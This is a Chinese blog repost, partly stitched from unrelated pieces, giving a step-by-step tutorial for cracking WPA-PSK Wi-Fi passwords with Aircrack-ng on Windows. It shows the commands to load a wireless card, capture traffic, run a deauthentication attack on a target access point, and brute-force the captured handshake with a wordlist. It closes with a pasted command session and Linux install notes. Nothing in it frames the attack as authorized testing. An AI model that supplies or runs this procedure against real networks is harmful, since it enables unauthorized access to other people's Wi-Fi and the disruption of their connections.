Aircrack-ng for Windows 的使用

Aircrack-ng for Windows 的使用,第1张

连接无线路由器后,将有线路由器的连接信息设置到无线路由器上,然后将有线路由器的线路移过来就行了。

或者将有线路由器接机器的线直接接到无线路由器的LAN上,设置WAN连接方式为动态IP,打开无线功能就行了。

注意:有线路由器和无线路由器可能IP一样,在同时使用时需要更改无线路由器的IP。

Aircrack-ng for Windows

使用Aircrack-ng for Windows破解WPA(转)

下载地址:http://www.path8.net/tn/wp-content/uploads/2010/10/aircrack-ng-1.1-win.zip

(打开迅雷,复制下载地址,然后新建下载任务,即可下载)

由于在Windows环境下不能如Linux环境般直接调用无线网卡,所以需要使用其他工具将无线网卡载

入,以便攻击工具 能够正常使用。在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工

具,就是airserv-ng。

步骤1:打开CMD,通过cd命令进入到aircrack-ng for Windows版本所在目录,输入airserv-ng,

可以看到如图5-29所示的内容。

图5-29 在CMD下运行airserv-ng

参数解释:

* -p,指定监听的端口,即提供连接服务的端口,默认为666;

* -d,载入无线网卡设备,需要驱动支持;

* -c,指定启动工作频道,一般设置为预攻击AP的工作频道,默认为1;

* -v,调试级别设定。

作为Windows下的破解,第一步就是使用airserv-ng来载入我们当前使用的无线网卡,为后续破解

做准备,命令 如下(注意:在命令中出现的引号一律使用英文下的引号输入):

airserv-ng -d “commview.dll|debug”

或者

airserv-ng -d “commview.dll| {my adapter id}”

输入完成后airserv-ng会自动搜寻现有无线网卡,会有提示,选择正确的无线网卡直接输入y,此

时airserv- ng就在正常载入驱动后,同时开始监听本地的666端口。换句话说,airserv-ng提供的

是该无线网卡的网络服务,其他计算机上的用户也可以连接到 这个端口来使用这块网卡,如图5-

30所示。

图5-30 airserv-ng工作中

步骤2:现在可以使用airodump-ng来搜索当前无线环境了。注意,要另开启一 个CMD,再输入如下

命令:

airodump-ng 127.0.0.1:666

这里在IP地址处输入为本机即127.0.0.1,端口采用的是默认的666。

图5-31 在CMD下运行airodump-ng

如图5-31所示,当确定预攻击目标AP的频道后,使用组合键Ctrl + C中断,即可使用如下参数来精

确定位目标:

airodump-ng –channel number -w filename 127.0.0.1:666

这里输入“airodump-ng –channel 7 -w onewpa 127.0.0.1:666”,回车后可看到如图5-32所示

的内容。

图5-32 在CMD下运行airodump-ng进行抓包

步骤3:现在,就可以和前面在BackTrack 2中讲述的一样进行Deauth攻击了,另开启一个CMD,输

入(如图5-33所示):

aireplay-ng -0 1 -a AP’s MAC 127.0.0.1:666

参数解释参考前面对应章节。

图5-33 进行Deauth攻击

在个别情况下,可能会在上面命令结束时出现wi_write<>:Operation now progress这样的提示,

这个提示在很多无线网卡下都会出现,意思是当前进程调用被占用时,Deauth攻击在大多数情况下

并不会受此影响。

步骤4:再开启一个CMD,输入命令查看是否捕获到WPA握手数据包。命令如下:

aircrack-ng 捕获的数据包名

如果没有捕获到WPA握手数据包,就会有如图5-34所显示的“0 handshake”,这个时候切回到刚才

aireplay-ng所在的CMD中重复进行Deauth攻击。

图5-34 没有获取到WPA握手数据包

攻击过程中注意观察airodump-ng工作界面,当右上角出现如图5-35所示的提示 时,就表示成功截

获到WPA握手数据包了。

图5-35 成功获取到WPA握手数据包

此时再次使用aircrack-ng 打开捕获的数据包,就可以看到截获到WPA <1 handshake>的显示了,

如图5-36所示,接下来便可以进行WPA本地破解了。

图5-36 载入破解时成功识别出获得的WPA握手数据包

破解WPA-PSK输入命令如下:

aircrack-ng -w password.txt onewpa*.cap

这里介绍一个小技巧,可以在输入数据包名后面加一个*号,来自动将捕获的该名称的所有数据包

整合导入。回车后,显示如图 5-37所示。

图5-37 在CMD下破解WPA-PSK加密

如同在Linux下破解WPA一般耐心地等待,就可以看到WPA密钥成功解出了,如图 5-38所示。

图5-38 成功破解出WPA-PSK密码

*****************

Microsoft Windows XP [版本 5.1.2600]

(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd\

C:\>d:

D:\>cd aircrack-ng

D:\aircrack-ng>cd bin

D:\aircrack-ng\bin>airserv-ng

Airserv-ng 1.1 - (C) 2007, 2008, 2009 Andrea Bittau

http://www.aircrack-ng.org

Usage: airserv-ng <options>

Options:

-h : This help screen

-p <port>: TCP port to listen on (default:666)

-d <iface>: Wifi interface to use

-c <chan>: Channel to use

-v <level>: Debug level (1 to 3default: 1)

D:\aircrack-ng\bin>airserv-ng -d “commview.dll|debug”

'debug”' 不是内部或外部命令,也不是可运行的程序

或批处理文件。

D:\aircrack-ng\bin>airserv-ng -d "commview.dll|debug"

Opening card commview.dll|debug

Adapter <commview.dll|debug>not supported

airserv-ng: wi_open(): No such file or directory

D:\aircrack-ng\bin>

说明: 在Linux下破解无线网络的工具,使用方法:把该文件复制到当前目录下,再执行dpkg -i aircrack-ng_1.0~rc3-1_i386.deb如果安装不成功,一般都是没在文件所在目录下执行命令具体破解方法,Google一下sudo apt-get install libssl-devsudo apt-get install libssl0.9.8然后进入aircrack-ng-1.0 的目录make allmake install下载spoonwep2 的bde安装包,双击安装运行spoonwep2


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/tougao/12201415.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-21
下一篇 2023-05-21

发表评论

登录后才能评论

评论列表(0条)

保存